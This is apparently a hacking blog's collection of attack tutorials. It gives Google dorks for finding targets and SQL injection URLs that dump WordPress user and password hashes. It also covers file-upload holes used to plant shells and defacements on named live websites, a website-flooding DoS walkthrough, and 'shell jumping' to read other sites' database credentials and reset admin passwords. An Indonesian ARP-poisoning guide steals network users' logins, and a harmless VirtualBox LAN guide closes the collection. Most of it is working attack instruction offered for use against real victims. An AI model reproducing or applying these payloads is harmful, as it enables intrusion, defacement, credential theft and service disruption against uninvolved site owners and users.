Hexjector : Opensource,Cross Platform PHP script to automate Site Pentest for SQL Injection Vulnerabilties.

Hexjector : Opensource,Cross Platform PHP script to automate Site Pentest for SQL Injection Vulnerabilties.

Hexjector is an Opensource,Cross Platform PHP script to automate Site Pentest for SQL Injection Vulnerabilties.

Features :
1.Check for SQL Injection Vulnerablities.
2.Pentest SQL Injection Vulnerablities.
3.Web Application Firewall Detector.
4.Scan For Admin Page
5.Manual Dump Function
6.Browser
7.SQL Injection Type Detection
8.Search For Vulnerable Sites by using Google Dork
9.MD5 Cracker

Download here

Geeklog Remote Deface Upload Vunerablity

Geeklog Remote Deface Upload Vunerablity

Geeklog Remote Deface Upload  Vunerablity, This Vunerablity is Similar to wordpress fckeditor upload Vunerablity (read about wordpress fckeditor upload Vunerablity ) in Geeklog just the Path Changed,


Lets Start 
open google.com & enter This dork 
inurl:"/geeklog/" 
or 
index of/ geeklog/fckeditor/editor/filemanager/upload/test.html

Now go to site site.com/geeklog/

 Now Put The Url /Geeklog/fckeditor/editor/filemanager/upload/test.html after .com .net or site domain

now the url will be 

site.com/Geeklog/fckeditor/editor/filemanager/upload/test.html

Now select php in 

Select the "File Uploader" to use:               Now Upload Your deface :)  Live Demo http://www.sightline4bd.com/geeklog/ http://www.sightline4bd.com/geeklog/fckeditor/editor/filemanager/upload/test.html http://sightline4bd.com/geeklog/images/libraryHack.htm

EzFilemanager Deface Upload vulnerability

EzFilemanager Deface Upload vulnerability

EzFilemanager Deface Upload vulnerability

 


Google Dork inurl:ezfilemanager/ezfilemanager.php
(Modify this dork for getting mor results from Google =)

Exploit : http://[xxx]/xxx/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file

Go to this url : website.com/lap/includes/tiny_mce/plugins/ezfilemanager/ezfilemanager.php and 

put ?sa=1&type=file after URL

now url will be :  http://website/PATCH/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file

Now see upload option and upload you file, you can upload ,html ,pdf ,ppt ,txt ,doc ,rtf ,xml ,xsl ,dtd ,zip ,rar ,jpg ,png files

Live Demo : http://www.monumentbiblechurch.com/administration/jscripts/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file

Result : http://www.monumentbiblechurch.com/mbcphotos/files/aaaaaaaa.txt


HappY new Year To all Readers !! Leave a comment if you enjoyed this post :D

Easy way of hacking Wordpress website

Easy way of hacking Wordpress website

Easy way of hacking Wordpress website

Hi here i tell you how to hack wordpress site with easy way i will use exploit to hacksites i saw lots of Messages that say "hey help can anyone can tell me how to hackwordpress" and it's an easy way with exploit ?



First we search with this in google to find sites

inurl:"wp-content/plugins/photoracer/viewimg.php?id="

see the Result :-





and i'm gonna test 1 of them for ex this find in google

http://www.badged.gr/wp-content/plugins/photoracer/viewimg.php?id=2

we are going to add the exploit : this is the exploit

/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--

and the site look like this

http://www.badged.gr/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--

now you can see the user and pass :D ! Just crack the hash and it's done
The admin panel is

http://Site/wp-login.php

Crash Small Websites with rDos

Crash Small Websites with rDos

REQUIRED Tools:
Port Scanner   -------- download it 
rDos ------- download it

Step One: First we need to find the websites IP Adress. This is too easy ... there are many methods to get website IP.. hope you know... if you dont know then comment below

Ok so say they URL is http://www.yoursite.com ok now that you have your URL open Up Cmd todo this press Start>Run>cmd Once you have CMD open you type pinghttp://www.yoursite.com press enter and you will get the ip of the website. (YOU MUST REMOVE HTTP:// AND ANY /'s).

EXAMPLE:

Step Two: Now we must test to see if port 80 is open (it usually is).

This is very easy todo to Ok open up the port scanner you downloaded.
Once in the port scanner type in your Victims ip that you got from step 1.
It will ask you to do a range scan or a full scan (SELECT REANGE SCAN!) It will ask for conformaition you have to use a capital Y or a capital N! Now enter 79 for lowest port and 81 for highest hit enter than hit cap Y. 

[X] = Closed
[X] Vulnerable = Open

Step Three:
The final and easiest step (IF PORT 80 IS CLOSED PICK A NEW SITE!)
If port 80 is open your on your way to crashing!!

Ok open Up rDos that you download.
Enter the ip that we got from step 1.
It will ask you for the port to attack use port 80 that is why we scaned to make sure 80 was open! If it is closed it will not work.
Hit enter.. *= Flooding -=Crashed Or didn't connect!

EXAMPLE:

The site won't be directly offline!!
it starts with ***********
be patiend.. after some time it will go like this: **********-----------

This means the site crashed.

Blind SQLi Tutorial

Blind SQLi Tutorial

what is Blind SQLi 


Blind SQL Injection is used when a web application is vulnerable to an SQL injection but the results of the injection are not visible to the attacker. The page with the vulnerability may not be one that displays data but will display differently depending on the results of a logical statement injected into the legitimate SQL statement called for that page. This type of attack can become time-intensive because a new statement must be crafted for each bit recovered. There are several tools that can automate these attacks once the location of the vulnerability and the target information has been established


Blind SQLi Tutorial 




Let’s Start…………                



Suppose That You want to Hack This website with Blind SQLi

http://site.com/index.php?id=5

when we execute this, we see some page and articles on that page, pictures
etc…

then when we want to test it for blind sql injection attack

http://www.site.com/index.php?id=5 and 1=1 <--- this is always true
and the page loads normally, that's ok.
now the real test

http://www.site.com/index.php?id=5 and 1=2 <--- this is false
so if some text, picture or some content is missing on returned page then
that site is vulrnable to blind sql injection.

1) Get the MySQL version
to get the version in blind attack we use substring
i.e
http://www.site.com/index.php?id=5 and substring(@@version,1,1)=4
this should return TRUE if the version of MySQL is 4.
replace 4 with 5, and if query return TRUE then the version is 5.
i.e
http://www.site.com/index.php?id=5 and substring(@@version,1,1)=5
2) Test if subselect works
when select don't work then we use subselect
i.e
http://www.site.com/index.php?id=5 and (select 1)=1
if page loads normally then subselects work. then we gonna see if we have access to mysql.user
i.e
http://www.site.com/index.php?id=5 and (select 1 from mysql.user limit 0,1)=1
if page loads normally we have access to mysql.user and then later we can
pull some password usign load_file() function and OUTFILE.
3). Check table and column names
This is part when guessing is the best friend :) i.e.
http://www.site.com/index.php?id=5 and (select 1 from users limit 0,1)=1
(with limit 0,1 our query here returns 1 row of data, cause subselect
returns only 1 row, this is very important.)
then if the page loads normally without content missing, the table users
exits.
if you get FALSE (some article missing), just change table name until you
guess the right one :)
let's say that we have found that table name is users, now what we need is
column name.
the same as table name, we start guessing. Like i said before try the
common names for columns.
i.e
http://www.site.com/index.php?id=5 and (select substring(concat(1,
password),1,1) from users limit 0,1)=1
if the page loads normally we know that column name is password (if we get
false then try common names or just guess)
here we merge 1 with the column password, then substring returns the first
character (,1,1)
4). Pull data from database
we found table users i columns username password so we gonna pull
characters from that.
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>80
ok this here pulls the first character from first user in table users.
substring here returns first character and 1 character in length. ascii()
converts that 1 character into ascii value
and then compare it with simbol greater then > .
so if the ascii char greater then 80, the page loads normally. (TRUE)
we keep trying until we get false.
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>95
we get TRUE, keep incrementing
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>98
TRUE again, higher
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>99
FALSE!!!
so the first character in username is char(99). Using the ascii converter
we know that char(99) is letter 'c'.
then let's check the second character.
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),2,1))>99
Note that i'm changed ,1,1 to ,2,1 to get the second character. (now it
returns the second character, 1 character in lenght)
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>99
TRUE, the page loads normally, higher.
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>107
FALSE, lower number.
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>104
TRUE, higher.
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>105
FALSE!!!
we know that the second character is char(105) and that is 'i'. We have
'ci' so far
so keep incrementing until you get the end. (when >0 returns false we know
that we have reach the end).
There are some tools for Blind SQL Injection, i think sqlmap is the best,
but i'm doing everything manually,
cause that makes you better SQL INJECTOR :D
Hope you learned something from this Tutorial.
Have FUN! :)

To be continued and updated…

BSQL Hacker : automated SQL Injection Framework Tool

BSQL Hacker : automated SQL Injection Framework Tool

It's easy to use for beginners and provide great amount of customisation and automation support for experienced users. Features a nice metasploit alike exploit repository to share and update SQL Injection exploits.

BSQL Hacker is an automated SQL Injection Framework / Tool designed to exploit SQL injection vulnerabilities virtually in any database.
BSQL Hacker aims for experienced users as well as beginners who want to automate SQL Injections (especially Blind SQL Injections).

Videos

• Sample exploitation and Injection Wizard Demo
• Error Based Injections and Attack Template Usage

 New version is out, it's mostly bug fixes :

 Screenshot

Key Features

• Easy Mode
• SQL Injection Wizard
• Automated Attack Support (database dump)
• ORACLE
• MSSQL
• MySQL (experimental)
• General
• Fast and Multithreaded
• 4 Different SQL Injection Support
• Blind SQL Injection
• Time Based Blind SQL Injection
• Deep Blind (based on advanced time delays) SQL Injection
• Error Based SQL Injection
• Can automate most of the new SQL Injection methods those relies on Blind SQL Injection
• RegEx Signature support
• Console and GUI Support
• Load / Save Support
• Token / Nonce / ViewState etc. Support
• Session Sharing Support
• Advanced Configuration Support
• Automated Attack mode, Automatically extract all database schema and data mode

• Update / Exploit Repository Features
• Metasploit alike but exploit repository support
• Allows to save and share SQL Injection exploits
• Supports auto-update
• Custom GUI support for exploits (cookie input, URL input etc.)

• GUI Features
• Load and Save
• Template and Attack File Support (Users can save sessions and share them. Some sections like username, password or cookie in the templates can be show to the user in a GUI)
• Visually view true and false responses as well as full HTML response, including time and stats

• Connection Related
• Proxy Support (Authenticated Proxy Support)
• NTLM, Basic Auth Support, use default credentials of current user/application
• SSL (also invalid certificates) Support
• Custom Header Support

• Injection Points (only one of them or combination)
• Query String
• Post
• HTTP Headers
• Cookies

• Other
• Post Injection data can be stored in a separated file
• XML Output (not stable)
• CSRF protection support (one time session tokens or asp.net viewstate ort similar can be used for separated login sessions, bypassing proxy pages etc.)

Another Eeasy Method of wordpress Blog Hacking (Wordpress Easy Comment)

Another Eeasy Method of wordpress Blog Hacking (Wordpress Easy Comment)

Recenly i Have Posted Some Tutorials on "How To Hack worpress Website/ Blog" you can check it here 
http://www.devilscafe.in/search/label/Wordpress%20Hacking?max-results=9
So its a New Tut of Wordpress Blog Hacking,,, Lets Start ...
Open Google.com and enter This Dork
inurl:"fbconnect_action=myhome"

You will find many sites, Select the site which you are comfortable with.

The website Url will be Like this http://www.site.com/?fbconnect_action=myhome&userid=

Now replace the ?fbconnect_action=myhome&userid= with 
?fbconnect_action=myhome&amp;userid=

with this
?fbconnect_action=myhome&amp;fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pa ​ss)z0mbyak,7,8,9,10,11,12+from+wp_users-- 

Now The URL will be Like this ..

www.site.com/?fbconnect_action=myhome&amp;userid=
with this
www.site.com/?fbconnect_action=myhome&amp;fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pa ​ss)z0mbyak,7,8,9,10,11,12+from+wp_users--
Now you have the User name and Password.

he password is encrypted with Wordpress md5 (blowfish). You need to decode this. Download And Run This Software to decode this type of password
Then find the administrator panel out. Normally it should be in
www.victrimsite.com/wp-admin

or

www.victrimsite.com/wp-login.php

Last Step : TYPE THE DECRYPTED USERNAME AND PASSWORD and Login In website :)

Ajax File Manager ~ Shell and Files Upload Vulnerability

Ajax File Manager ~ Shell and Files Upload Vulnerability

Open Google Search Engine, Type this dork : inurl:/plugins/ajaxfilemanager/
For Example I got : 
http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/session/
 or http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/jscripts/edit_area/reg_syntax/
or any site else ...
Now Put  ajaxfilemanager/ajaxfilemanager.php after /plugins/ in url 


for example : 
http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/ajaxfilemanager.php
http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php


Now Find Upload Upload and Upload Your shell/Deface/file


To view you File find /Uploaded/ directory in Website by using your brain :P


example of uploaded file : http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/uploaded/aaaaaaaa.txt
http://www.ziaislamic.com/BOOK-CMS/interfaces/uploaded/aaaaaaaa.txt


Some Demo sites


http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/ajaxfilemanager.php
http://www.thebradshawscornershop.co.uk/scripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php
http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php
http://202.137.23.162/brantas_portal/assets/tinymce/plugins/ajaxfilemanager/ajaxfilemanager.php
http://www.apmsa.org.za/admin/scripts/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php


Results : 
http://www.ziaislamic.com/BOOK-CMS/interfaces/uploaded/yourfilehere
http://www.thebradshawscornershop.co.uk/images/yourfilehere
http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/uploaded/yourfilehere
http://202.137.23.162/brantas_portal/uploaded_docimage/yourfilehere
http://www.apmsa.org.za/admin/scripts/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/uploaded/yourfilehere


if you need Login in any ajaxfilemanager 


Default Password Ajax File Manager
Username:ajax
Password:123456

"Simple Upload 53" : Shell Upload Vulnerability

"Simple Upload 53" : Shell Upload Vulnerability

Title : "Simple Upload 53" : Shell Upload Vulnerability
Google Dork : "inurl:simple-upload-53.php"          


Go to Google.com and enter dork ~ 
"inurl:simple-upload-53.php" 


see search results and select any website 


the exploit url will be link this 


http://www.site.com/simple-upload-53.php


Now Upolad Your shell here as .php.jpg .php.girf etc 
and you can upload your deface in image Type


to view you uploaded file just goto http://www.site.com/files/yourfilehere


Demo site : http://www.stpatricksdayshirts.com/simple-upload-53.php
Uploaded file : http://www.stpatricksdayshirts.com/files/devilscafe.jpg


Funnt Thing : http://www.stpatricksdayshirts.com/simple-upload-53.php?message= Put Your Massege here it will show on website :D

"Shell Jumping" Hacking wordpress websites Based on same server

"Shell Jumping" Hacking wordpress websites Based on same server

"Shell Jumping" Hacking Other websites Based on same server using b374k Newbie3viLc063s shell





Newbie3viLc063s shell is coded by newbie c0de d3vil, its a suitble shell for "Localhost Jumping"
This shell is new verison of most popular shell b374k 
download it here : http://pastebin.com/JDhBnfkH
(copy source from pastebin raw data section and paste it in notepad and save as any name .php, like shell.php or devilscafe.php ) 


Step 1- download shell =)
Click On Local Domain To view all websites based on same server 
Check for readable 
[click to view image]
Step 2 - Now choose any website from Local host domain list and copy Senarai User value then goto home and paste in view file/folder after home/replacethiskeyword/public_html/
for example current view file/folder value = home/abc/public_html
and your website's Senarai User value (username) is xyz then view file/folder value will be home/xyz/public_html/
[click to view image]
Step 3 - After Going to that Folder Look for MySQL confiq (wp-config.php in wordpress and configuration.php for joomla ) now open The file and you'll Got datbase username and password here 
it will Looks like 
Username =

/** MySQL database username */
define('DB_USER', 'googlyma_wrdp1');


PASSWORD =

/** MySQL database password */
define('DB_PASSWORD', 'PHZ2hum6{{KE');
[click to view image]
Step 4- Now Conncet to MYSQL datbase with username and Password
and enter this SQL Query 
UPDATE wp_users SET user_pass =md5( '123456') WHERE user_login = 'admin';
[click to view image]
Step 5- goto : http://webste.com/wp-admin/ and login with Username and password
[click to view image]

Images Via :Newbie3viLc063s

"Portail Dokeos" deface and Shell Upload vulnerability

"Portail Dokeos" deface and Shell Upload vulnerability

Portail Dokeos vulnerability is a Kind of FCK editor remote file upload vulnerability
in this vulnerability hacker can upload a shell. deface page or any file on website without admin username and password




Google Dork : "Portail Dokeos 1.8.5"
Exploit :http://website/patch/main/inc/lib/fckeditor/editor/filemanager/upload/test.html


Goto : http://website/patch/main/inc/lib/fckeditor/editor/filemanager/upload/test.html chnage asp into PHP like FCK editor and Upload you deface shell or file, You can upload, .html .php .jpg .txt formats here
To view your uploaded file go here : http://website/patch/main/upload/your file here 


Live Demo : http://www.blowupwebshow.com/staff/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://www.blowupwebshow.com/staff/main/upload/backlinks.html
http://www.rottapro.net/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://www.rottapro.net/main/upload/backlinks.html


Other websites For practice



http://campus.flone.be/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://ns5.freeheberg.com/~dispensa/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://www.dokeos.nrc-gauthey.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://www.ladapt-hn.com/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://my.eurasiam.com/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://el.technifutur.be/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://www.formation.megalodon.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://www.pharmconseil-elearning.com/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://pro.accru.info/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://www.formation-microkine.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://foad.ina.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://campus.technifutur.be/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://www.fpafoad22.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://www.ecoleprimaireenligne.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://campus.flone.be/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://www.elearning80.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html

"QuiXplorer 2.3 <= Bugtraq File Upload Vulnerability" Upload shell and deface easily

"QuiXplorer 2.3 <= Bugtraq File Upload Vulnerability" Upload shell and deface easily

"QuiXplorer 2.3 <= Bugtraq File Upload Vulnerability"





open Google.com and type this dork 
intitle:"QuiXplorer 2.3 - the QuiX project"


you'll see a lot of sites, some big websites are vuln too like haeward university website,
select any website from search results
Vulnerablity

http://[localhost]/[path]/index.php?action=list&order=name&srt=yes

http://site.com/[xyz]/index.php?action=list&order=name&srt=yes

 after Going to this you will saw a file manager 

you can upload your files here 

find this edit file create file etc icons in page and click on last, its upload option You can direct upload too with chnaging url, just put action=upload&order=name&srt=yes after index.php? example :

http://site.com/[xyz]/index.php?action=upload&order=name&srt=yes

Shell Example : shell.php, shell.asp, shell.html, shell.php.jpg, shell.asp.jpg, or,,
- anything support file

click On you file For view 

Live demo : 

http://www.hcs.harvard.edu/~eac/letters/files/index.php?action=list&order=name&srt=yes

http://www.hcs.harvard.edu/~eac/letters/files/index.php?action=upload&order=name&srt=yes

http://www.hcs.harvard.edu/~eac/letters/filestorage/  

i know some asshole will chnage the deface 

so its mirrOr of defacements http://attack-h.org/attack/?id=8452

Title : "Encodable" ~ another File upload Vulnerablity

Google Dork : "intext:File Upload by Encodable"

Lets Start .. xd

open google.com and enter this dork :  "intext:File Upload by Encodable"

result comes with 166,000 results but some results are fake ... its may be malwaers 

so pick real things only , "Upload a file"  You will this title in search results here :)

click the sites sites only which comes with upload a file title 

after click the link you'll got a upload form 

you'll saw some options in this form like name Description email etc ...

 type anything in these boxes but add a email in email box, dont use your own 

put this one billy@microsoft.com , admin@nasa.gov etc :P

now choose you file and upload it :) 

after clicking on upload button a pop up will be open ... dont close it, it will automatilcly closed 

after uploading file 

in some sites you'll got you uploaded file link after uploading on website 

and if you did not file it then try these url

/upload/files/

or /upload/userfiles/

Live Demo : http://150.101.230.65:8008/cgi-bin/filechucker.plx

Uploaded page : http://150.101.230.65:8008/upload/files/xd.html

Tutorial cain dan abel

Siapa tidak tahu pasangan serasi dalam dunia hacking? ya Cain & Abel, keduanya merupakan pasangan untuk melakukan hack dalam jaringan dengan fitur yang cukup lengkap. Nah aku disini mau kasih tutorial cain & abel + preview. Link download cain & abel:http://www.oxid.it/cain.html Untuk proses installnya gak usah di ajarin ya.. aku anggep semua udah pada bisa…eh ini bisa berjalan dalam 1 jaringan, so kalo kamu ke warnet, orang” yang login FS, FB, dan lainnya bisa didapat user ma passnya. Hal ini juga berlaku di hot spot seperti yang aku lakuin. langsung aja buka cain + abelnya.. klik start / stop sniffer seperti pada gbr : Abis itu klik tanda + [warna biru] untuk melakukan scan mac address, maka tampilan akan seperti ini : pada mac address scan langsung klik OK saja maka akan loading dan didapatkan banyak IP address dalam 1 jaringan dan bisa diketahui mac addressnya: setelah lancar sampai disini kamu bisa langsung ke selanjutnya aja. Klik APR di tab bagian bawah, dan tampilan akan seperti ini: setelah itu klik tanda + [warna biru] untuk menambahkan IP address yang ingin di poisoning . tampilan akan seperti ini: di bagian kiri kamu pilih IP routernya [bagaimana kita tahu IP routernya?... apa perlu dijelasin juga?] masuk ke cmd dan ketikan ipconfig /all maka akan diketahui segenap informasi. Nah pikir aja sendiri mana yang jadi routernya ya. yang dibagian kanan adalah IPaddress yang ingin di poisoning. Kalau mau semua 1 jaringan cukup blok semua aja. Nah abis itu klik ok. Abis langkah itu maka tampilannya seperti ini: Nah statusnya idle kan? itu tandanya belum di poisoning. Klik start / stop arp dan statusnya akan berubah menjadi poisoning: Adanya daftar dibawah menandakan bahwa ada proses yang sedang dikerjakan langsung saja masuk ke dalam password dengan klik tab password di bagian bawah: nah klik dibagian kiri HTTP, dan lihat hasilnya: selesai Itu ada sengaja ada 1 yang gak aku tutup, coba aja masih bisa buat login pa ga

Lab Virtual LAN II

Sekarang kita jalankan Windows XP yang telah terinstall di VirtualBox.

Masuk ke Control Panel – Network Connections maka akan keluar windows seperti gambar dibawah ini :

Klik kanan Ethernet tersebut lalu pilih properties, maka akan tampil windows seperti berikut :

Pilih Internet Protocol (TCP/IP) lalu klik tombol Properties, akan keluar windows untuk memasukan Ip Address dan juga Subnet Mask, masukan nilai IP 192.168.0.2 dan Subnet Mask 255.255.255.0. Untuk lebih jelasnya lihat gambar dibawah ini :

Selanjutnya kita rubah Workgroup dan juga Computer Name pada Windows XP dengan cara, masuk Control Panel – System maka akan keluar windows seperti berikut ini :

Rubah Computer Description sesuka hati anda, tapi gak diisi juga gapapa sih. Lalu untuk merubah Computer Name dan juga Workgroup klik tombol change, maka akan keluar windows seperti gambar berikut ini :

Rubah Computer Name sesuka hati anda namun pastikan namanya berbeda dengan yang telah kita setting di Windows 7, selanjutnya rubah nama Workgroup, nah kalo nama Workgroup ini harus sama dengan yang kita buat di Windows 7. Selanjutnya klik tombol Ok.

Settingan telah selesai, sekarang kita akan mencoba untuk melakukan Ping dari Guest yaitu Windows XP ke Host atau server yaitu Windows 7.

Buka Command Prompt dengan cara tekan tombol Windows + R, lalu ketikan cmd. Atau anda bisa menemukannya melalui Start – All Programs – Accessories – Command Prompt. Maka akan keluar Command Prompt seperti berikut ini :

Lalu ketikan ping 192.168.0.1 pada Command Prompt tersebut, karena kita akan mengecek apakah Windows XP sudah terhubung dengan Windows 7. Maka jika sukses hasilnya akan seperti gambar dibawah ini :

Ok kita telah berhasil membuat sebuah jaringan LAN (Local Area Network) secara virtual, jadi kalo ada yang mau belajar membuat sebuah aplikasi Client-server tidak harus susah-susah untuk membeli sebuah komputer baru, cukup dengan menggunakan cara diatas maka kita telah memiliki sebuah komputer virtual yang dapat digunakan sebagai client dari aplikasi Client-Server yang dibuat.